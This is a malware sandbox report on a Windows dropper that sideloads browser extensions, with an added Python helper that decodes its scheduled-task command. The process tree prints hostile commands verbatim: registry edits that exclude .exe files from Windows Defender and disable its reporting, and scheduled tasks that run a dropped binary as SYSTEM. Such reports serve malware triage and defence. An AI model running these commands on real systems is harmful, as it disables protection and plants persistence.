Analysis
max time kernel: 95s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-12-2022 09:08

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7-20220812-en

General
Target: file.exe
Size: 7.2MB
MD5: ff55f4067e93ffb346a752baf7b5ced3
SHA1: 1656902f49e626a01d9f7f41de1d983ccc21b376
SHA256: 0db6a5a7e7be62c8fd8b206bd889285aebafe58692bb718768449b06ae7ae1bc
SHA512: a4bd8090df176f0cc428e5c9198cbaa32c8775be26fd1cd45c181cbef9e58811b218dc21da7d9350fbae7ac2bdfdc75bd5dc30bc3d8b7d9433e4d30fc775517a
SSDEEP: 196608:91OI/5t5b5FeRP6Z28u8NEFTyPpxonTewNPljKt3qEKR7xf7:3OE9s8NiTUpCnDVKt3qEe7xD
Malware Config
Signatures
Blocklisted process makes network request 1 IoCs
flow  pid   Process
111   4992  rundll32.exe

Executes dropped EXE 4 IoCs
pid   Process
2692  Install.exe
3884  Install.exe
3360  VOqDozH.exe
4672  IPWdkTc.exe

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description        ioc                                                            Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Install.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description        ioc                                                                                                 Process
Key value queried  \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation  IPWdkTc.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation  Install.exe

Loads dropped DLL 1 IoCs
pid   Process
4992  rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension 1 IoCs
description   ioc                                                                                                                       Process
File created  C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json  IPWdkTc.exe

Drops desktop.ini file(s) 1 IoCs
description                   ioc                                    Process
File opened for modification  C:\$RECYCLE.BIN\S-1-5-18\desktop.ini  IPWdkTc.exe
Drops file in System32 directory 29 IoCs
description                   ioc                                                                                                                                                              Process
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D  IPWdkTc.exe
File created                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log  powershell.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA  IPWdkTc.exe
File created                  C:\Windows\system32\GroupPolicy\gpt.ini  Install.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA  IPWdkTc.exe
File created                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
File created                  C:\Windows\system32\GroupPolicy\Machine\Registry.pol  VOqDozH.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5  IPWdkTc.exe
File opened for modification  C:\Windows\system32\GroupPolicy\gpt.ini  VOqDozH.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA  IPWdkTc.exe
File opened for modification  C:\Windows\system32\GroupPolicy\Machine\Registry.pol  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751  IPWdkTc.exe
File opened for modification  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D  IPWdkTc.exe
Drops file in Program Files directory 14 IoCs
Besides dropping DLL/XML pairs into randomly named folders under Program Files (x86), IPWdkTc.exe backs up and rewrites Firefox's omni.ja and writes an .xpi into browser\features, i.e. it sideloads a Firefox extension alongside the Chrome extension listed above.
description                   ioc                                                                              Process
File created                  C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi  IPWdkTc.exe
File opened for modification  C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi  IPWdkTc.exe
File created                  C:\Program Files\Mozilla Firefox\browser\omni.ja.bak  IPWdkTc.exe
File opened for modification  C:\Program Files\Mozilla Firefox\browser\omni.ja.bak  IPWdkTc.exe
File created                  C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\pJwbNMt.xml  IPWdkTc.exe
File created                  C:\Program Files (x86)\VpeeuBoLdsfCC\sVNKQSC.dll  IPWdkTc.exe
File created                  C:\Program Files (x86)\mgLqjNPWU\ducyvKD.xml  IPWdkTc.exe
File created                  C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\lqXfkFf.dll  IPWdkTc.exe
File created                  C:\Program Files (x86)\mgLqjNPWU\xlUxoh.dll  IPWdkTc.exe
File opened for modification  C:\Program Files\Mozilla Firefox\browser\omni.ja  IPWdkTc.exe
File created                  C:\Program Files (x86)\mMQoIZnNGNdU2\axNlhUnxvouhO.dll  IPWdkTc.exe
File created                  C:\Program Files (x86)\mMQoIZnNGNdU2\dUhjECQ.xml  IPWdkTc.exe
File created                  C:\Program Files (x86)\VpeeuBoLdsfCC\dJNhyRi.xml  IPWdkTc.exe
File created                  C:\Program Files (x86)\VMeMEPztOsUn\MbMUSbj.dll  IPWdkTc.exe
Drops file in Windows directory 4 IoCs
The .job files are the legacy task format that schtasks writes when a task is created with /V1, as the bVPnZmTmfBquXJeKIT task in the process tree is.
description   ioc                                        Process
File created  C:\Windows\Tasks\bVPnZmTmfBquXJeKIT.job  schtasks.exe
File created  C:\Windows\Tasks\CeimXGcICqHikUZiG.job   schtasks.exe
File created  C:\Windows\Tasks\UQjVtDzLrufMISZ.job     schtasks.exe
File created  C:\Windows\Tasks\rTRcbUUPNNGcKFAGn.job   schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour, but nothing else in this report (no mass file modification, no ransom note) supports that reading; the observed payload is browser-extension sideloading and Defender tampering.
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
2964  schtasks.exe
1640  schtasks.exe
3892  schtasks.exe
3292  schtasks.exe
2968  schtasks.exe
4204  schtasks.exe
5044  schtasks.exe
4800  schtasks.exe
3820  schtasks.exe
1072  schtasks.exe
2640  schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs
description        ioc                                                                  Process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    Install.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  Install.exe
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    rundll32.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
description      ioc                                                                                                                  Process
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root                                                    powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs                                               powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs                             powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA                                             powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs                                         powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing        IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs                                                 powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed                                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs                                         powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople                                           powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs                                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs                                     powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs                                                 powershell.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"        IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA                                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates                                 powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs                                               powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs                                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA                                             powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs                                               powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs                                        powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates                        powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}  IPWdkTc.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"  rundll32.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs                                                 powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople                                           powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                          IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates                                       powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust                                                   powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot                                           powershell.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1"                       IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs                                powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed                                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople                                  powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates                                       powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust                                                   powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root                                                    powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates                              powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates                             powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates                                powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs                                      powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket                                  IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume                           IPWdkTc.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\NukeOnDelete = "0"  IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs                                         powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs                             powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs                                        powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates                                 powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed                                     powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople                                  powershell.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"      IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed                                     powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates                                         powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs                                powershell.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates                     powershell.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\MaxCapacity = "15140"  IPWdkTc.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"       IPWdkTc.exe
Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs                                                 powershell.exe
Suspicious behavior: EnumeratesProcesses 47 IoCs (identical rows collapsed; count in last column)
pid   Process         rows
1880  powershell.EXE  2
3912  powershell.exe  3
1440  powershell.exe  3
1136  powershell.EXE  3
4672  IPWdkTc.exe     36

Suspicious use of AdjustPrivilegeToken 4 IoCs
description              pid   Process
Token: SeDebugPrivilege  1880  powershell.EXE
Token: SeDebugPrivilege  3912  powershell.exe
Token: SeDebugPrivilege  1440  powershell.exe
Token: SeDebugPrivilege  1136  powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs (identical rows collapsed; count in last column)
description                        pid   Process         procid_target  rows
PID 2780 wrote to memory of 2692   2780  file.exe        80             3
PID 2692 wrote to memory of 3884   2692  Install.exe     81             3
PID 3884 wrote to memory of 4076   3884  Install.exe     82             3
PID 3884 wrote to memory of 4636   3884  Install.exe     84             3
PID 4076 wrote to memory of 4320   4076  forfiles.exe    87             3
PID 4320 wrote to memory of 1172   4320  cmd.exe         89             3
PID 4636 wrote to memory of 4628   4636  forfiles.exe    90             3
PID 4320 wrote to memory of 3080   4320  cmd.exe         91             3
PID 4628 wrote to memory of 116    4628  cmd.exe         92             3
PID 4628 wrote to memory of 2348   4628  cmd.exe         93             3
PID 3884 wrote to memory of 2968   3884  Install.exe     96             3
PID 3884 wrote to memory of 2564   3884  Install.exe     98             3
PID 1880 wrote to memory of 2512   1880  powershell.EXE  103            2
PID 3884 wrote to memory of 2564   3884  Install.exe     112            3
PID 3884 wrote to memory of 2964   3884  Install.exe     114            3
PID 3360 wrote to memory of 3912   3360  VOqDozH.exe     120            3
PID 3912 wrote to memory of 4596   3912  powershell.exe  124            3
PID 4596 wrote to memory of 1712   4596  cmd.exe         125            3
PID 3912 wrote to memory of 3996   3912  powershell.exe  126            3
PID 3912 wrote to memory of 1360   3912  powershell.exe  127            3
PID 3912 wrote to memory of 2180   3912  powershell.exe  128            3
PID 3912 wrote to memory of 1444   3912  powershell.exe  129            2
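The two schtasks /CREATE command lines in the process tree below carry the persistence story of this sample: one task runs a base64-encoded PowerShell one-liner as the logged-on user, the other runs the dropped VOqDozH.exe as SYSTEM. As an added example (not part of the sandbox report or of the sample), the following Python decodes the -EncodedCommand payload (base64 over UTF-16LE text) and pulls the triage-relevant fields out of both lines. The command lines are copied from this report; the function names and the field labels are mine.

```python
import base64
import re

# Both schtasks /CREATE command lines, copied from the process tree of this report.
SCHTASKS_CMDLINES = [
    r'schtasks /CREATE /TN "gzxnkpWHu" /SC once /ST 01:39:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bVPnZmTmfBquXJeKIT" /SC once /ST 10:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe\" vN /site_id 525403 /S" /V1 /F',
]

# A schtasks switch followed by either a quoted argument (which may contain \"-escaped
# quotes, as the /TR of the second task does) or a bare token.
_SWITCH = re.compile(r'/(TN|SC|ST|RU|TR)\s+(?:"((?:\\.|[^"\\])*)"|(\S+))', re.IGNORECASE)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; match the usual spellings.
_ENCODED = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(blob).decode("utf-16-le")


def parse_schtasks_create(cmdline: str) -> dict:
    """Extract the fields that matter for persistence triage from a schtasks /CREATE line."""
    fields = {}
    for m in _SWITCH.finditer(cmdline):
        switch = m.group(1).upper()
        value = m.group(2) if m.group(2) is not None else m.group(3)
        fields[switch] = value.replace(r'\"', '"')  # undo the escaping schtasks needs inside /TR
    action = fields.get("TR", "")
    enc = _ENCODED.search(action)
    return {
        "task_name": fields.get("TN"),
        "schedule": fields.get("SC"),
        "start_time": fields.get("ST"),
        "run_as": fields.get("RU"),
        "legacy_v1_format": " /V1" in cmdline.upper(),  # /V1 tasks appear as C:\Windows\Tasks\*.job
        "action": action,
        "decoded_command": decode_encoded_command(enc.group(1)) if enc else None,
    }


if __name__ == "__main__":
    for line in SCHTASKS_CMDLINES:
        for key, value in parse_schtasks_create(line).items():
            print(f"{key:>18}: {value}")
        print()
```

The encoded blob decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is exactly the powershell.EXE / gpupdate.exe pair that appears at the top level of the tree: the installer writes local Group Policy files (gpt.ini and Machine\Registry.pol under C:\Windows\system32\GroupPolicy, listed under "Drops file in System32 directory") and then forces a policy refresh so they take effect. The second task is the one that leaves a .job file in C:\Windows\Tasks because of /V1, and it runs the dropped binary with the same /site_id 525403 argument as the installer, but as SYSTEM.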
Processes (children indented under their parent)

C:\Users\Admin\AppData\Local\Temp\file.exe  [PID 2780]
  cmd: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\7zS799A.tmp\Install.exe  [PID 2692]
      cmd: .\Install.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zS7CB6.tmp\Install.exe  [PID 3884]
          cmd: .\Install.exe /S /site_id "525403"
          - Executes dropped EXE
          - Checks BIOS information in registry
          - Checks computer location settings
          - Drops file in System32 directory
          - Enumerates system info in registry
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\forfiles.exe  [PID 4076]
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe  [PID 4320]
                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                  - Suspicious use of WriteProcessMemory
                    \??\c:\windows\SysWOW64\reg.exe  [PID 1172]
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                    \??\c:\windows\SysWOW64\reg.exe  [PID 3080]
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            C:\Windows\SysWOW64\forfiles.exe  [PID 4636]
              cmd: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe  [PID 4628]
                  cmd: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                  - Suspicious use of WriteProcessMemory
                    \??\c:\windows\SysWOW64\reg.exe  [PID 116]
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                    \??\c:\windows\SysWOW64\reg.exe  [PID 2348]
                      cmd: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            C:\Windows\SysWOW64\schtasks.exe  [PID 2968]
              cmd: schtasks /CREATE /TN "gzxnkpWHu" /SC once /ST 01:39:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              - Creates scheduled task(s)
            C:\Windows\SysWOW64\schtasks.exe  [PID 2564]
              cmd: schtasks /run /I /tn "gzxnkpWHu"
            C:\Windows\SysWOW64\schtasks.exe  [PID 2564]
              cmd: schtasks /DELETE /F /TN "gzxnkpWHu"
            C:\Windows\SysWOW64\schtasks.exe  [PID 2964]
              cmd: schtasks /CREATE /TN "bVPnZmTmfBquXJeKIT" /SC once /ST 10:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe\" vN /site_id 525403 /S" /V1 /F
              - Drops file in Windows directory
              - Creates scheduled task(s)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  [PID 1880]
  cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\gpupdate.exe  [PID 2512]
      cmd: "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe  [PID 4848]
  cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe  [PID 3580]
  cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe  [PID 4280]
  cmd: gpscript.exe /RefreshSystemParam

